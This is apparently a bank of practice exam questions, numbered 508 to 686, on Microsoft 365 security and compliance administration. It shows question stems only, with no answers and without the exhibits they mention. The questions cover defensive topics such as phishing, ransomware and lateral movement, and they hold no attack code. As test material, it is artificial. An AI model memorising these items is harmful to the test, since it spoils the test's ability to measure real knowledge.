Medium508Your organization is planning to migrate from on-premises Exchange to Exchange Online. You need to choose a migration strategy. Which TWO statements about migration methods are correct?
Medium509You are configuring Microsoft Defender for Office 365 to protect against business email compromise (BEC) attacks. Which policy setting should you enable to analyze email sender behavior and detect impersonation attempts?
Hard510A company uses Microsoft Entra ID Governance to automate the lifecycle of user access. They want to automatically remove a user's group membership for a critical application 30 days after the user's employment end date is captured from the HR system. Which feature should be configured to meet this requirement?
Hard511Your organization is a financial services company with 5,000 users. You use Microsoft Defender XDR, including Defender for Endpoint Plan 2, Defender for Identity, Defender for Office 365 Plan 2, and Defender for Cloud Apps. You have recently deployed Microsoft Copilot for Security to assist your security operations center (SOC) analysts. A high-severity incident is generated: 'A user named jdoe accessed a malicious IP address from their device, and then logged into Azure Portal from an anonymous IP address. Defender for Identity detected a suspicious Kerberos ticket request from the same user's domain controller. The SOC analysts are overwhelmed with alerts and need to quickly understand the full scope of the incident, including related alerts, impacted assets, and recommended actions. They also want to use natural language to ask questions about the incident. What should you do to enable the analysts to efficiently investigate this incident?
Hard512You are a compliance administrator for Contoso Ltd. The company uses Microsoft Purview Information Protection with sensitivity labels. A new regulation requires that all documents labeled 'Highly Confidential' must be encrypted and only accessible by members of the 'Legal' group, even when shared externally. You have published a label named 'Highly Confidential' with encryption settings. You need to ensure that the label enforces these requirements when applied to documents in Office apps. What should you configure in the label's encryption settings?
Hard513Which THREE components are required to implement auto-labeling for sensitivity labels in Microsoft 365?
Hard514Your organization uses Microsoft Purview Data Lifecycle Management. You need to review the disposition of content that has reached the end of its retention period. What should you configure?
Medium515Your organization has Microsoft 365 E5 licenses and uses Microsoft Defender for Office 365. You need to ensure that users are warned before clicking on malicious URLs in email messages, even if the URL is clicked after the email is delivered. Which policy should you configure?
Hard516You are the compliance administrator for Contoso Ltd., a multinational corporation with 10,000 users. The company uses Microsoft 365 E5 licenses and has deployed Microsoft Purview. The legal department requires that all email communications related to ongoing litigation be preserved for the duration of the case. You have identified the custodians and relevant keywords. You need to ensure that all relevant emails are preserved, regardless of whether users delete them. Additionally, you need to allow authorized reviewers to search and export the preserved emails without affecting the original data. Finally, you must ensure that the preservation is lifted automatically when the case is closed. What should you do?
Hard517Your organization uses Microsoft Defender for Office 365. You need to ensure that malicious links in email messages are blocked at the time of click by checking the link reputation in real time. What should you enable?
Easy518Your company, Fabrikam Inc., uses Microsoft Entra ID with hybrid identity. You have an on-premises Active Directory and use Microsoft Entra Connect Sync to synchronize users. You need to configure Microsoft Entra ID Protection to detect leaked credentials and risky sign-ins. Additionally, you must ensure that when a user is detected as high risk, their access is automatically blocked and they are required to change their password. You also need to enable password writeback so that password changes are written back to on-premises AD. You have the following options: A. Enable Identity Protection, configure user risk policy to require password change, and enable password writeback in Microsoft Entra Connect. B. Enable Identity Protection, configure sign-in risk policy to block access, and enable password hash sync. C. Configure Conditional Access policy to require MFA for all users, and enable seamless SSO. D. Deploy Microsoft Defender for Identity and configure automatic remediation. Which option should you choose?
Hard519Your organization uses Microsoft Defender for Endpoint. A user reports that their device is not receiving security updates. You need to ensure that the device is properly onboarded to Defender for Endpoint. Which log should you check first?
Medium520Your organization uses Microsoft Defender for Cloud Apps. You discover that a user is downloading large amounts of data from SharePoint Online to an unmanaged device. You need to automatically block the download and alert the security team. What should you configure?
Medium521An administrator who is not a Global Administrator needs to manage just-in-time privileged access to Azure resources using Microsoft Entra Privileged Identity Management (PIM). Which built-in role must be assigned to the administrator to allow PIM management for Azure resources?
Medium522Your company is migrating from on-premises Exchange to Exchange Online. You have configured a hybrid deployment. During testing, you notice that free/busy information is not being shared between on-premises and cloud users. All other hybrid features work. What is the most likely cause?
Hard523You are a security administrator for a company that uses Microsoft Defender XDR. You need to integrate Microsoft Defender XDR with Microsoft Sentinel to create a unified incident view. You want to ensure that incidents from Defender XDR are automatically created in Sentinel. What should you do?
Hard524Your organization uses Microsoft Entra ID P2 and has a hybrid identity environment with Microsoft Entra Connect Sync. You need to implement a solution that automatically remediates risky user sign-ins by requiring a password change when Microsoft Entra ID Protection detects a leaked credential. You also want to minimize help desk calls. Which configuration should you use?
Hard525An admin needs to provide a vendor with temporary access to a SharePoint site. What should the admin create?
Easy526Which THREE features are part of Microsoft Defender XDR? (Select THREE.)
Medium527An administrator needs to add a custom domain 'contoso.org' to their Microsoft 365 tenant. They have already purchased the domain and have access to the DNS registrar. What is the first step the administrator should perform in the Microsoft 365 admin center?
Easy528Your organization is planning to migrate from on-premises Active Directory to Microsoft Entra ID using Azure AD Connect. You need to ensure that password synchronization is enabled. Which TWO components are required for password synchronization to work?
Medium529Your organization uses Microsoft Defender for Endpoint. You need to configure a rule that automatically isolates a device from the network when a specific threat is detected, but only if the device is in a specific device group. Which approach should you use?
Hard530A company is planning to deploy Microsoft Defender for Endpoint to its Windows 10 devices. The devices are managed by Microsoft Intune. The security team wants to ensure that the MDE sensor is installed automatically on new devices that are enrolled in Intune. Which method should the team use?
Medium531You are a security administrator for a company that uses Microsoft Defender XDR. You need to investigate an incident that involves multiple alerts across different workloads. Which feature in Microsoft Defender XDR should you use to view the full attack story and related entities?
Easy532A company has an existing Microsoft 365 tenant with the verified custom domain 'contoso.com'. The administrator now wants to add a second custom domain, 'contoso-europe.com', to the same tenant. What is the first step the administrator should take?
Easy533A company uses Microsoft Entra ID P2 licenses. The security team wants to automatically require a password change for users with medium sign-in risk, but only when the sign-in originates from outside the corporate network. Users with high sign-in risk should be blocked entirely. A group of break-glass accounts must be excluded from all policies. Which feature should the administrator implement?
Medium534A company uses dynamic groups based on department attribute. A user moved from Sales to Marketing but the group membership did not update after 48 hours. What should the admin do first?
Hard535Which TWO actions can you perform using Microsoft Purview Data Loss Prevention (DLP) policies?
Medium536An organization uses Microsoft Entra ID P2 licenses. They want to implement a policy that forces users to perform multi-factor authentication (MFA) only when they sign in from an untrusted location. The trusted locations include the corporate office IP range. Which type of policy should they create?
Medium537You are configuring Microsoft Defender for Office 365. Which TWO actions should you take to protect users from phishing attacks that use impersonation?
Medium538Your organization uses Microsoft Defender XDR and Microsoft 365 E5 licenses. You are a security administrator. The security team wants to receive email notifications for high-severity incidents only. You need to configure the notification settings. What should you do?
Medium539Match each Microsoft 365 role to its administrative scope.
Medium540Your organization has a Microsoft 365 E5 tenant with 10,000 users. You need to ensure that when a user is detected as high-risk by Microsoft Entra ID Protection, the user is automatically blocked from accessing sensitive SharePoint sites. The solution should minimize administrative overhead. What should you do?
Medium541Which TWO actions can you perform using Microsoft Purview eDiscovery (Premium)? (Choose two.)
Medium542You are a Microsoft 365 Administrator for a company that is implementing a hybrid identity solution with Active Directory Federation Services (AD FS) for single sign-on (SSO). The company has recently acquired a subsidiary with its own on-premises Active Directory domain. You need to ensure that the identity lifecycle for users from the subsidiary is managed effectively through Microsoft Entra ID (formerly Azure AD) and that licensing is assigned efficiently. Which three of the following actions should you take? (Choose three.)
Medium543A security administrator is configuring Microsoft Defender for Cloud Apps to protect against data exfiltration from SaaS apps. The administrator wants to create a policy that alerts when a user attempts to download more than 50 files from SharePoint Online within 5 minutes. Which two components must be configured to achieve this? (Choose two.)
Medium544Contoso uses Microsoft Entra ID P2. Users report that password reset self-service does not work. You verify that the users have the required license. What should you check next?
Easy545The exhibit shows a DLP policy configuration. A user reports that they cannot share a document containing a credit card number from OneDrive for Business. However, the document was shared successfully last week. What is the most likely reason for the change?
Medium546Your organization uses Microsoft Purview Communication Compliance to detect inappropriate messages in Microsoft Teams. You need to configure a policy that monitors for potential harassment based on a built-in classifier. The policy should alert designated reviewers when a match is found. What is the minimum configuration required?
Easy547Your organization uses Microsoft Purview eDiscovery (Premium) for a legal investigation. You need to collect data from Microsoft Teams chat messages and channel conversations. The case manager wants to search for specific keywords and exclude irrelevant content. What should you do?
Medium548Your organization uses Microsoft Defender for Cloud Apps. You need to create a policy that automatically blocks downloads of files containing sensitive information from SharePoint Online to unmanaged devices. What type of policy should you create?
Hard549Your company is using Microsoft 365 Business Premium. You want to ensure that all company-owned Windows 10 devices are automatically upgraded to Windows 11 when it becomes available through Windows Update. What should you configure?
Easy550Your organization uses Microsoft Entra ID and has enabled Microsoft Entra Domain Services (Azure AD DS). You need to ensure that legacy applications that require NTLM authentication can still authenticate against the managed domain. What should you configure?
Medium551An organization is involved in a legal case and needs to preserve all emails in a user's mailbox, including future emails, without deleting or modifying them. The user must continue to work normally. Which Microsoft Purview feature should be applied to the user's mailbox?
Medium552Which THREE actions can be taken by a Microsoft Purview Data Loss Prevention (DLP) policy in Exchange Online?
Hard553A security administrator wants to automatically block malicious IP addresses from sending email to Exchange Online mailboxes. Which Microsoft Defender component should be configured?
Medium554Your organization uses Microsoft 365 Defender for Office 365. You need to ensure that phishing emails reported by users are automatically submitted for analysis in Microsoft Defender XDR. What should you configure?
Medium555Your company has a Microsoft 365 E5 tenant. You need to ensure that all external emails are marked with a warning banner at the top of the email body. What should you configure?
Easy556Your company is planning to adopt Microsoft Copilot for Microsoft 365. The security team is concerned about data leakage. What must you implement to ensure that Copilot respects your organization's sensitivity labels and data classification?
Hard557Your organization is deploying Microsoft 365 for a multinational company. You need to ensure users in different regions authenticate against the nearest Microsoft Entra ID endpoint for performance. What should you configure?
Easy558An organization has registered the domain contoso.com and added it to their Microsoft 365 tenant. What is the next step to use this domain for user email addresses?
Medium559An administrator needs to configure the default anti-spam policy for all users in the Microsoft 365 Defender portal. Where should the administrator navigate to find these settings?
Easy560You are the Microsoft 365 administrator for a multinational company. The company has deployed Microsoft Defender for Office 365 and Microsoft Defender for Cloud Apps. Recently, the security team detected that a user's credentials were compromised and used to access SharePoint Online from an unusual location. You need to investigate the incident and determine the full scope of the breach. The solution must use Microsoft 365 Defender to correlate events. What should you do first?
Medium561Your company uses Microsoft Defender for Endpoint and wants to perform a live response on a device. Which THREE prerequisites must be met?
Hard562A compliance officer needs to prevent users from accidentally sharing documents containing credit card numbers with external users via email. The block should occur at the time the user attempts to send the email. Which Microsoft Purview feature should be configured?
Medium563An administrator wants to restrict which users in the organization can create Microsoft 365 groups. The requirement is that only members of the IT department (identified by the department attribute in Azure AD) should be able to create groups. Which configuration should the administrator use?
Easy564You are a security administrator for a company that uses Microsoft Defender XDR. A security incident involving a compromised user account has been escalated. You need to identify all devices where the compromised user account signed in within the last 7 days. Which Microsoft Defender XDR feature should you use?
Medium565Your company uses Microsoft Entra ID with hybrid joined devices. You need to enforce multi-factor authentication (MFA) for all cloud app access but want to exclude specific locations (trusted IPs). What is the most efficient way to implement this?
Hard566Your company is planning to use Microsoft 365 Copilot for Microsoft 365. Which THREE prerequisites are required for Copilot to function? (Choose three.)
Easy567A compliance officer needs to prevent users from sharing documents labeled 'Confidential' via email with external recipients. If a user attempts to send such an email, the action should be blocked and a policy tip displayed. Which Microsoft Purview feature should be configured?
Medium568Your organization uses Microsoft 365 E5 with Microsoft Entra ID P2. You have a hybrid identity environment with Microsoft Entra Connect Sync. You need to ensure that when a user is disabled in on-premises Active Directory, their Microsoft 365 access is blocked within 5 minutes, and any active refresh tokens are invalidated. You have already configured password hash synchronization. What should you do?
Hard569Your organization uses Microsoft Entra ID and requires that all guest users must have a mobile phone number registered for authentication. You need to enforce this requirement. What should you configure?
Easy570Match each Microsoft 365 service to its primary purpose.
Medium571Your organization uses Microsoft Entra ID and has an application that requires the 'User.Read.All' permission. You need to grant this permission to the application but ensure that only an administrator can consent, not users. What should you do?
Medium572Which TWO permissions are required for a custom role to manage Conditional Access policies in Microsoft Entra ID?
Medium573A compliance officer needs to ensure that all documents uploaded to SharePoint Online that contain passport numbers are automatically labeled with a 'Highly Confidential' sensitivity label. Which two Microsoft Purview features must be configured together to achieve this? (Choose two.)
Medium574A company wants to use Azure AD Identity Protection features such as user risk policies and sign-in risk policies to automatically respond to risky behavior. Which Azure AD license is required to enable these capabilities?
Easy575Your organization uses Microsoft Entra ID. You need to ensure that users can only access company resources from trusted networks. Which Conditional Access condition should you configure?
Medium576A company has purchased 1000 Microsoft 365 E5 licenses and wants to automatically assign licenses to users based on their department attribute, which is synchronized from on-premises Active Directory. The department attribute is stored in Azure AD. Which automated method should the administrator use to achieve this?
Easy577A compliance administrator needs to automatically apply a retention label to documents in a SharePoint Online site that contain the keyword 'Project Alpha'. The label should retain the documents for 5 years and then delete them. Which two Microsoft Purview features must be configured to achieve this? (Choose two.)
Medium578Which THREE are valid Microsoft Entra ID license plans that include Identity Protection?
Hard579An administrator runs the PowerShell command shown in the exhibit. What is the immediate effect on the user?
Easy580A company has just signed up for Microsoft 365 Business Standard without adding a custom domain. An administrator needs to create the first user accounts. What will be the default email address format for these new users?
Easy581You are a Microsoft 365 administrator. Your tenant has a Microsoft Entra ID P2 license. You need to create a dynamic group for all users whose department is 'Engineering' and who are located in the United States. Which rule syntax should you use?
Hard582You are the Microsoft 365 administrator for a company with a Microsoft 365 E3 tenant. The security team requires that you reduce the attack surface for email by blocking auto-forwarding to external domains and by ensuring that any email sent from an external sender that spoofs your custom domain is rejected. You must implement the controls natively in Microsoft 365 Defender. Which two actions should you perform? (Choose two.)
Medium583Your organization has deployed Microsoft Defender for Cloud Apps. You want to detect anomalous behavior such as impossible travel for users accessing cloud apps. You need to configure the appropriate policy. Which policy type should you create?
Hard584A company uses Azure AD Identity Protection. The security team wants to automatically block users from signing in when the user risk level is 'High'. Which policy should they configure?
Medium585A company wants to automatically assign Microsoft 365 E5 licenses to all users in the Sales department. The department is identified by the department attribute in Microsoft Entra ID. The administrator needs to configure a method where licenses are assigned based on group membership, and the group membership is automatically updated based on user attributes. Which licensing approach should the administrator use?
Medium586Your organization uses Microsoft Entra ID and has a Conditional Access policy that requires compliant devices for access to corporate resources. You need to ensure that iOS devices are compliant before accessing Exchange Online. Which Microsoft Intune policy should you configure?
Medium587You are implementing Microsoft Defender for Office 365. You need to configure anti-phishing policies to protect against user impersonation. Which THREE settings should you configure?
Hard588A security administrator wants to configure Automated Investigation and Response (AIR) in Microsoft 365 Defender to automatically isolate a device when a high-severity alert for malware is detected. Which step is required?
Medium589You are reviewing directory settings for Microsoft 365 Groups. Based on the exhibit, which statement is true?
Hard590An organization with Microsoft Entra ID P2 licenses needs to enforce that all users accessing the Azure portal must use FIDO2 security keys for multi-factor authentication. Which configuration should be implemented?
Hard591Your organization uses Microsoft Entra ID. You need to enable users to reset their own passwords without administrator intervention. Which TWO components must be configured?
Medium592A compliance officer needs to ensure that any email sent from the organization that contains personally identifiable information (PII) such as social security numbers is automatically encrypted when the recipient is outside the organization. Which Microsoft Purview solution should the officer configure?
Easy593A security administrator wants to prevent malware from using Office macros to spawn malicious processes. Specifically, they want to block Excel, Word, and PowerPoint from creating child processes. Which Microsoft Defender for Endpoint capability should be configured?
Hard594Which TWO roles can manage user licenses without being able to create users?
Medium595You are a Microsoft 365 administrator for a company that uses Microsoft Defender for Cloud Apps. The security team wants to detect when users download a large number of files from SharePoint Online in a short period, which could indicate data exfiltration. You need to create a policy to alert on this activity. What should you do?
Medium596Your organization uses Microsoft Intune to manage Windows 10 devices. You need to deploy a custom Line-of-Business (LOB) app to a group of devices. The app is not in the Microsoft Store. What is the recommended method to deploy the app?
Medium597A junior administrator needs permission to view sign-in logs, audit logs, and security recommendations in the Microsoft Entra admin center, but must not be able to reset passwords, modify settings, or manage roles. Which built-in Microsoft Entra role should the administrator assign?
Medium598Your company is implementing Microsoft Purview Data Loss Prevention (DLP) to protect credit card numbers in emails. Which THREE actions can a DLP policy take when a match is found?
Easy599An administrator deployed the above Intune device configuration policy for Microsoft Defender for Endpoint on Windows 10 devices. Users report that some potentially unwanted applications (PUA) are still being installed. What is the most likely cause?
Hard600Your organization uses Microsoft Entra ID Governance. You need to implement an access review for all users who have access to a critical application. The review must be recurring every quarter and require reviewers to provide a justification for their decisions. Which access review settings should you configure?
Hard601A legal department needs to preserve all communications related to an ongoing lawsuit. They identify specific users and require that their mailbox items and OneDrive files are not altered or deleted. Which Microsoft Purview feature should be used?
Medium602A company uses password hash synchronization with Microsoft Entra Connect. The security team wants to enable self-service password reset (SSPR) so that users can reset their own passwords, and the password changes must be written back to the on-premises Active Directory. Which additional configuration is required to achieve password writeback?
Medium603You manage a Microsoft 365 tenant for a company that uses Microsoft Defender for Office 365 Plan 2. The security team reports that several users clicked a link in a phishing email and entered credentials on a fake sign-in page. You must identify which users were compromised and remediate their accounts as quickly as possible. What should you do?
Hard604A company with Azure AD Premium P2 licenses wants to enforce that all activations of the Global Administrator role require approval from a designated security group. The activation must also require a business justification and expire after 4 hours. Which Azure AD feature should the administrator configure?
Medium605Drag and drop the steps to configure role-based access control (RBAC) in Microsoft 365 Defender in the correct order.
Medium606A company uses Microsoft Entra ID P2 licenses. A security administrator needs to grant a user temporary elevation to the Global Administrator role for a specific task. The elevation should require approval from a designated group and be time-limited. Which Microsoft Entra feature should be configured?
Medium607Your organization needs to manage guest access to Microsoft Teams. Which TWO methods can you use to control guest access?
Easy608You need to prevent users from registering security information for Microsoft Entra self-service password reset (SSPR) if they are not in a specific group. What should you configure?
Easy609A company uses Microsoft Entra ID P2 licenses and wants to enforce multi-factor authentication (MFA) for all users when accessing corporate applications. However, a small group of break-glass accounts must be excluded from MFA requirements to ensure emergency access. The administrator creates a Conditional Access policy targeting all users. Which configuration should be applied to achieve the exclusion?
Medium610An administrator adds the custom domain 'fabrikam.com' to a new Microsoft 365 tenant. After adding the domain, the status shows 'Pending verification'. Which type of DNS record must be added to the public DNS zone to complete domain ownership verification?
Easy611You are reviewing a Conditional Access policy in JSON format. The policy is applied to all users accessing Office 365 from trusted locations. What is the intended behavior of this policy?
Medium612You are the Microsoft 365 administrator for a company that uses Microsoft Entra ID P1 and Microsoft 365 E3. A new security policy requires that when users sign in from outside the corporate network, they must use Microsoft Entra multifactor authentication. However, users signing in from the corporate office network must not be prompted for MFA. The corporate office has a public IP address range of 203.0.113.0/24. You create a named location called 'Corporate Office' with this IP range. What should you do next to meet the requirement?
Medium613A company has a Microsoft 365 tenant that uses the default contoso.onmicrosoft.com domain. The IT team wants to add a new custom domain, contoso.com, and ensure that all existing users' primary email addresses automatically change to the new domain. They also want to prevent users from signing in with the onmicrosoft.com domain. What should the administrator do first?
Medium614A compliance officer needs to retain all email messages in a user's Exchange Online mailbox for 7 years after the message is sent or received, and then automatically delete them. The retention must be enforced regardless of user actions. Which Microsoft Purview solution should be used?
Medium615You are examining the default cross-tenant access policy for your Microsoft Entra ID tenant. Based on the exhibit, which statement is true?
Medium616An organization wants to delegate user creation to help desk staff without granting global admin rights. Which role should be assigned?
Medium617Match each Microsoft 365 migration tool to its use case.
Medium618A company plans to enable Self-Service Password Reset (SSPR) for all users. The administrator needs to ensure that users are required to register at least two authentication methods before they can use SSPR. Which configuration setting should the administrator modify?
Medium619An organization has just purchased Microsoft 365 Business Standard licenses. The administrator adds a new user through the admin center. By default, does the new user receive a welcome email with sign-in instructions?
Easy620Your organization uses Microsoft Defender for Office 365. You need to ensure that all email messages containing encrypted attachments are automatically scanned for malware before delivery. What should you configure?
Easy621Your organization uses Microsoft Defender for Office 365. Users report that legitimate emails from a specific partner domain are being moved to Junk Email folder. You verify that the partner's SPF, DKIM, and DMARC records are correctly configured. Which two actions should you take to resolve this issue?
Medium622You have a Microsoft 365 E5 tenant with Microsoft Defender for Cloud Apps. You need to discover unsanctioned cloud apps used by users. What should you configure?
Hard623Your organization uses Microsoft Defender for Cloud Apps. You need to create a policy that detects when a user signs in from an unknown IP address and then downloads a large number of files. Which THREE components should you configure?
Hard624The exhibit shows a KQL query used in Microsoft 365 Defender. The query returns no results for admin@contoso.com. What is the most likely reason?
Medium625A user with an E5 license is unable to use Azure Information Protection (AIP). The admin confirms the license is assigned. What is the most likely cause?
Hard626Refer to the exhibit. You deploy this configuration profile to Windows devices. What is the most likely outcome?
Easy627Your organization uses Microsoft Entra ID and has strict security requirements. You need to implement a Zero Trust security model. Which THREE of the following are foundational principles of Zero Trust that should be implemented?
Hard628A security administrator needs to implement a just-in-time (JIT) privileged access solution for the Global Administrator role. Users must request activation and provide a business justification. The request must be approved by a separate group of approvers, and the role activation should expire after 4 hours. Which Microsoft Entra feature should be configured?
Medium629A compliance officer wants to automatically apply a 'Confidential' sensitivity label to documents in SharePoint Online that contain credit card numbers. The label should be applied when the documents are created or modified. Which Microsoft Purview feature should be configured?
Medium630A company is planning to migrate from on-premises Exchange to Exchange Online and needs to ensure that mail flow can coexist between the two environments during the transition. Which tool should the administrator use to configure this hybrid deployment?
Medium631A new administrator needs to automatically assign Microsoft 365 E5 licenses to all users in the Sales department. The Sales department is identified by the 'department' attribute in Azure AD. Which licensing method should the administrator use to minimize manual effort?
Easy632You need to configure Microsoft Defender for Cloud Apps to detect anomalous user behavior such as impossible travel. Which type of policy should you create?
Easy633A security administrator needs a single console to investigate and respond to a complex incident involving alerts from endpoints, email, and identities. Which Microsoft portal should they use?
Easy634Your organization uses Microsoft Entra ID for identity management. You need to ensure that users can sign in using their Google Workspace credentials without creating external identities. What should you configure?
Medium635A compliance officer wants to prevent users from sending emails that contain personally identifiable information (PII), such as social security numbers, to external recipients. If a user attempts to send such an email from Outlook, the email should be blocked and a policy tip explaining the block should be displayed. Which Microsoft Purview solution should the officer configure?
Easy636You are a Microsoft 365 administrator. Users report that they cannot create Microsoft Teams meetings using the Teams desktop client. They receive an error: 'Meeting creation is disabled by your IT administrator.' You need to enable meeting creation. You check the Teams admin center and find that meeting policies are set to 'Off' for 'Allow private meeting scheduling'. However, after changing it to 'On', users still get the error. What is the most likely cause?
Hard637Your company is deploying Microsoft 365 for a new subsidiary with 500 users. You need to configure the initial tenant with a custom domain (contoso.com) and verify ownership. What is the first step you must perform?
Easy638Your organization uses Microsoft Defender for Cloud Apps. You need to create a policy that alerts when a user downloads more than 10 files from SharePoint Online within 10 minutes. This activity should be considered anomalous. Which type of policy should you create?
Easy639An administrator runs the Azure CLI command shown in the exhibit. What is the result of this command?
Medium640A company wants to prevent their Microsoft 365 tenant from allowing external users to be invited by default. Only specific administrators should be able to invite guests. Which setting should be changed?
Easy641Drag and drop the steps to configure Data Loss Prevention (DLP) policies in Microsoft Purview in the correct order.
Medium642You are a security administrator for Fabrikam, Inc. The company uses Microsoft Defender XDR with Microsoft Defender for Identity, Microsoft Defender for Endpoint, and Microsoft Defender for Cloud Apps onboarded. An analyst is investigating a suspected pass-the-hash attack against a domain controller. The analyst needs to correlate identity signals with device and cloud app activity in the unified incident. You must identify which Defender XDR capabilities the analyst can use to pivot from an identity alert to related device and cloud activity. (Choose two.)
Hard643A compliance officer needs to prevent users from sending emails that contain sensitive information, such as social security numbers, to external recipients. If a user attempts to send such an email, the action should be blocked and a policy tip should be displayed to the user. Which Microsoft Purview solution should the officer configure?
Medium644A Microsoft Purview auto-labeling policy for sensitivity labels is matching too many SharePoint documents after simulation. Which two changes would most directly reduce false positives before enabling automatic labeling? (Choose two.)
Hard645Contoso is a multinational company with 50,000 users. They have a Microsoft 365 E5 subscription and use Microsoft Entra ID for identity. They recently deployed Microsoft Copilot for Microsoft 365 to 10,000 users. The security team wants to ensure that Copilot responses do not expose sensitive information. They also need to monitor Copilot usage for unusual activity. The company uses Microsoft Purview Information Protection and Microsoft Defender for Cloud Apps. You need to configure the environment to meet these requirements. Which action should you take?
Hard646You need to configure self-service password reset (SSPR) for users in Microsoft Entra ID. Which license is required?
Easy647A company adds and verifies the custom domain 'contoso.com' in their Microsoft 365 tenant. However, emails sent to new users at user@contoso.com bounce back. The existing MX record for contoso.com points to the on-premises mail server. What is the most likely cause of the bounce?
Medium648You are a security administrator for a large enterprise with 10,000 users. The company uses Microsoft 365 E5 licenses, which include Microsoft Defender XDR. The company has recently experienced a series of ransomware attacks where attackers gained initial access through phishing emails, then moved laterally using compromised credentials, and finally deployed ransomware on file servers. The CISO wants to implement a comprehensive defense strategy that reduces the attack surface and automates response. The requirements are: 1) Prevent phishing emails from reaching users, especially those targeting executives. 2) Detect and block lateral movement using compromised credentials. 3) Automatically contain compromised devices during an incident. 4) Provide a unified incident view across email, endpoints, and identities. You need to recommend a solution that meets all requirements with minimal manual effort. What should you do?
Hard649You are a security administrator for a company that uses Microsoft Defender XDR. You need to configure alert policies to notify the security team when specific activities occur. You want to receive notifications for alerts related to malicious file detection and suspicious sign-in attempts. Which two actions should you perform? (Choose two.)
Medium650Refer to the exhibit. What is the effect of this session policy?
Medium651Which TWO tools can be used to manage Microsoft 365 tenant settings and configurations?
Easy652Your organization uses Microsoft Defender XDR. You need to configure automatic attack disruption for SaaS applications. Which Microsoft 365 security solution provides this capability?
Easy653You are configuring Microsoft Defender for Identity. Which THREE capabilities does it provide?
Hard654Which TWO features are part of Microsoft Purview Communication Compliance?
Easy655Your company uses Microsoft Entra ID for identity management. You are planning to implement Conditional Access policies. Which TWO components are required to create a Conditional Access policy?
Easy656Match each Microsoft 365 networking port to its protocol.
Medium657A company has recently signed up for Microsoft 365 Business Premium. They want to change the default domain from onmicrosoft.com to a custom domain they own. Which step must be completed first before the custom domain can be used for user email addresses?
Easy658You are investigating a phishing campaign targeting your organization. In Microsoft Defender XDR, you run a KQL query in Advanced Hunting to find all email messages that contain a specific phishing URL. Which table should you query?
Medium659Your organization uses Microsoft Entra Conditional Access. You need to block access from countries where your company does not operate. The list of blocked countries changes frequently. What is the most efficient way to manage this?
Medium660A company wants to enable self-service password reset (SSPR) for all users. Which two configurations are mandatory to allow users to reset their own passwords? (Choose two.)
Hard661A security administrator needs to block outbound network connections from a compromised Windows device to a known malicious IP address. The solution should be configured in Microsoft Defender for Endpoint and must work at the network layer, not relying on a user-installed client. Which feature should the administrator enable?
Medium662Your organization has a Microsoft 365 E5 subscription and uses Microsoft Entra ID. You are implementing Privileged Identity Management (PIM) to manage access to Azure AD roles. You need to ensure that when a user activates a privileged role, the activation request must be approved by their manager and must include a ticket number. What should you configure?
Hard663Refer to the exhibit. You run the PowerShell commands shown. The output displays 10 mailboxes with various RecipientTypeDetails, including UserMailbox, SharedMailbox, and RoomMailbox. You need to ensure that only user mailboxes are returned. What should you modify?
Medium664Your company is required to retain all emails sent to and from executives for 7 years due to regulatory compliance. You need to implement this with minimal administrative overhead. What should you use?
Hard665You need to implement a solution that allows users to classify documents containing personal data as 'Highly Confidential' and automatically encrypt them when shared via email. What should you configure?
Easy666Refer to the exhibit. You are reviewing the service principal for Microsoft Graph in your tenant. The passwordCredentials array is empty. What does this indicate?
Hard667Your company has a Microsoft 365 E5 subscription and uses Microsoft Entra ID. You have configured Microsoft Entra Identity Governance. You need to create an access review for all guest users in the tenant to ensure their access is still required. The review should be recurring every 90 days and should auto-remove guests if they are not approved. What should you configure?
Hard668A security analyst needs to search for devices that have been communicating with a known malicious command-and-control server over the past 7 days. The analyst wants to identify the process that initiated the connection. Which advanced hunting query would be most efficient?
Medium669A security administrator needs to block unsanctioned cloud apps in real time using a reverse proxy. Which two Microsoft Defender for Cloud Apps components must be configured?
Medium670Your organization uses Microsoft Defender XDR. You need to configure automatic response actions for a high-severity incident. Which TWO options are available in the Microsoft Defender XDR automated investigation and response capabilities?
Medium671Administrators want to enforce multi-factor authentication (MFA) for all users when accessing cloud applications from untrusted networks. They plan to use Azure AD Conditional Access with named locations. Which two components must be configured to meet this requirement? (Select two.)
Medium672After adding a custom domain name to a Microsoft 365 tenant, what is the first step the administrator must complete before users can sign in using the custom domain?
Easy673Your organization has a hybrid identity deployment with Microsoft Entra Connect. You have synchronized all on-premises Active Directory users to Microsoft Entra ID. You need to enable Microsoft Entra ID Password Protection to automatically block weak passwords. You have installed the Password Protection proxy on a server and registered it. You also need to enforce the password protection policy for on-premises users. What additional step is required?
Medium674You are a security administrator. You need to configure a policy that automatically blocks sign-ins from anonymous IP addresses for all users in your Microsoft 365 tenant. Which policy should you configure in Microsoft Entra ID?
Medium675Your organization uses Microsoft 365 and wants to ensure that only compliant devices can access Exchange Online. You have Microsoft Intune for device management. What should you configure?
Medium676Your organization uses Microsoft Entra ID Governance. You need to automate the removal of access when an employee leaves the company. The identity lifecycle should trigger access reviews and automatic deprovisioning. What should you configure?
Hard677Your organization uses Microsoft Intune to manage Windows 10 devices. You need to ensure that only compliant devices can access Microsoft 365 resources. What should you configure?
Medium678Your organization has a Microsoft 365 E5 subscription and uses Microsoft Teams. You need to prevent external users from being added to sensitive teams that contain financial data. What should you configure?
Medium679A compliance officer needs to automatically identify and label content that is conceptually similar to existing sensitive documents, such as internal strategy memos or proprietary technical specifications, without relying on explicit keywords or recognized sensitive information types. Which Microsoft Purview solution should the officer use to achieve this?
Hard680Refer to the exhibit. You have a Conditional Access policy configured as shown. What is the effect of this policy?
Easy681You need to monitor which users have accessed a specific document stored in SharePoint Online over the last 90 days. What should you use?
Easy682Your organization uses Microsoft Defender XDR. You need to configure automated investigation and response (AIR) for email and collaboration content. Which policy type should you configure in the Microsoft 365 Defender portal?
Easy683A company wants to reduce help desk calls by allowing users to reset their own passwords securely. Users should be able to reset their passwords using a mobile phone number or email as verification. Which Microsoft Entra ID feature should be enabled?
Easy684A company has a Microsoft 365 E5 tenant with 10,000 users. You need to delegate the ability to manage Microsoft Entra ID roles to a group of support engineers. The solution must follow the principle of least privilege and allow engineers to assign only specific roles to users. What should you do?
Hard685Your organization uses Microsoft Purview to classify and protect data. You need to create a custom sensitive info type that detects employee IDs formatted as 'EMP-XXXXX' where X is a digit. Which approach should you use?
Medium686Your organization has Microsoft Defender for Cloud Apps (MCAS) deployed. You need to create a policy that automatically blocks downloads of files classified as 'Highly Confidential' from SharePoint Online to unmanaged devices. Which policy type should you use?
